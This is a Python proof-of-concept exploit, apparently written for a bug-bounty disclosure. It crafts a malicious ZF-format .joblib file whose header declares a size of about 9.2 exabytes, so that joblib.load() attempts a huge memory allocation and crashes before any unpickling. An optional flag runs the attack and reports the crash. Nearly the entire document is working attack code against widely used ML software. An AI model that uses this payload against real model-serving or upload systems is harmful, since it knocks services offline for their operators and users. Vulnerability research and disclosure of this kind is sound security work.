#!/usr/bin/env python3
"""
PoC: Joblib ZF Header DoS — Unbounded Memory Allocation in read_zfile()
CVE: TBD | CWE-770 | CVSS 7.5

Vulnerability:
  joblib/numpy_pickle_compat.py — read_zfile() reads the declared buffer size
  from the ZF file header as a 19-character hex string, then passes it
  directly to zlib.decompress() as the `bufsize` argument — NO bounds check:

    _ZFILE_PREFIX = b'ZF'
    _MAX_LEN = 19  # hex digits

    length = file_handle.read(len(_ZFILE_PREFIX) + _MAX_LEN)
    length = length[len(_ZFILE_PREFIX):]  # strip 'ZF' prefix
    length = int(length, 16)              # attacker-controlled!
    data = zlib.decompress(file_handle.read(), 15, length)
    # ↑ zlib pre-allocates `length` bytes before decompressing
    # With length=0x7FFFFFFFFFFFFFFF → 9.2 EB allocation attempt → CRASH

  The crash happens BEFORE any Pickle deserialization — bypasses all joblib
  Pickle safety settings (trusted=True, etc.).

Attack surface:
  Any code that calls joblib.load() on untrusted .joblib files:
  - ML pipelines loading user-supplied models
  - Model registries accepting external uploads
  - scikit-learn model serving

Usage:
  python3 poc_exploit.py            # generates malicious_zf.joblib
  python3 poc_exploit.py --trigger  # also triggers the crash via joblib.load()

Author: security research (huntr.com submission)
"""

import struct
import sys
import os
import io
import zlib

# ZF format constants (from joblib/numpy_pickle_compat.py)
_ZFILE_PREFIX = b'ZF'  # magic prefix
_MAX_LEN = 19          # hex string length for declared size

# Declared size used by default and echoed in the MemoryError report.
_DEFAULT_DECLARED_SIZE = 0x7FFFFFFFFFFFFFFF

OUTPUT_FILE = 'malicious_zf.joblib'


def create_malicious_zf_joblib(declared_size: int = 0x7FFFFFFFFFFFFFFF) -> bytes:
    """
    Craft a minimal ZF-format joblib file with a huge declared buffer size.

    Actual ZF file layout (joblib/numpy_pickle_compat.py):
      Bytes 0-1:   b'ZF'                    ← _ZFILE_PREFIX
      Bytes 2-20:  19-char hex string       ← declared size (attacker-controlled)
      Bytes 21+:   zlib-compressed payload  ← actual data (ignored — crash happens first)

    joblib parses this as:
      length = int(file_data[2:21], 16)
      data = zlib.decompress(rest, 15, length)  # ← pre-allocates `length` bytes!

    Args:
        declared_size: Value written into the header's size field. Must be
            non-negative and representable in ``_MAX_LEN`` hex digits.

    Returns:
        The complete file content: prefix + zero-padded hex size + a zlib
        stream compressing a single NUL byte.

    Raises:
        ValueError: If ``declared_size`` is negative or needs more than
            ``_MAX_LEN`` hex digits.

    A summary of the crafted file is printed to stdout as a side effect.
    """
    # Explicit range check instead of `assert`: asserts vanish under -O, and a
    # length-only check lets negatives through (f"{-1:019x}" is 19 chars long
    # once the sign is counted).
    if not 0 <= declared_size < 16 ** _MAX_LEN:
        raise ValueError(
            f"declared_size must fit in {_MAX_LEN} unsigned hex digits, "
            f"got {declared_size!r}"
        )

    # Format declared_size as 19-character hex string (zero-padded)
    size_hex = f"{declared_size:0{_MAX_LEN}x}".encode()  # e.g. b'0007fffffffffffffff'

    # Minimal valid zlib stream (crash happens during pre-allocation, before decompress)
    compressed_payload = zlib.compress(b'\x00')

    payload = _ZFILE_PREFIX + size_hex + compressed_payload

    print("[*] Crafted ZF .joblib file:")
    print(f" Format : {_ZFILE_PREFIX.decode()} + {_MAX_LEN}-char hex size")
    print(f" Size hex: {size_hex.decode()}")
    print(f" Declared: {declared_size:#x} = {declared_size:,} bytes (~{declared_size/2**40:.1f} TiB)")
    print(f" File size: {len(payload)} bytes (crash before decompression)")

    return payload


def main():
    """
    Write the crafted file to OUTPUT_FILE and optionally load it with joblib.

    When ``--trigger`` is present in ``sys.argv`` the file is passed to
    ``joblib.load()`` and the outcome (MemoryError, another exception, or an
    unexpected success) is reported on stdout. Without the flag only a usage
    hint is printed.
    """
    trigger = '--trigger' in sys.argv

    # Generate the malicious file
    payload = create_malicious_zf_joblib()
    with open(OUTPUT_FILE, 'wb') as f:
        f.write(payload)
    print(f"[+] Malicious file written: {OUTPUT_FILE} ({os.path.getsize(OUTPUT_FILE)} bytes)")

    if not trigger:
        print("\n[i] Run with --trigger to demonstrate the crash via joblib.load()")
        print(f" python3 {sys.argv[0]} --trigger")
        return

    print("\n[*] Triggering via joblib.load()...")
    # The broad handler is deliberate: this is the script's top-level boundary
    # and every outcome (including a missing joblib install) is reported
    # rather than propagated.
    try:
        import joblib
        print(f" joblib version: {joblib.__version__}")
        result = joblib.load(OUTPUT_FILE)
        print(f"[-] Unexpected success: {result}")
    except MemoryError as e:
        print("[+] CRASH CONFIRMED: MemoryError")
        print(f" zlib.decompress(data, 15, {_DEFAULT_DECLARED_SIZE:,}) pre-allocated ~9.2 EB")
        print(f" Error: {e}")
    except Exception as e:
        name = type(e).__name__
        message = str(e).lower()
        # Some allocation failures surface as other exception types whose
        # text mentions memory/allocation; treat those as confirmation too.
        if 'memory' in message or 'alloc' in message:
            print(f"[+] CRASH CONFIRMED: {name}: {e}")
        else:
            print(f"[~] Exception (check manually): {name}: {e}")


if __name__ == '__main__':
    main()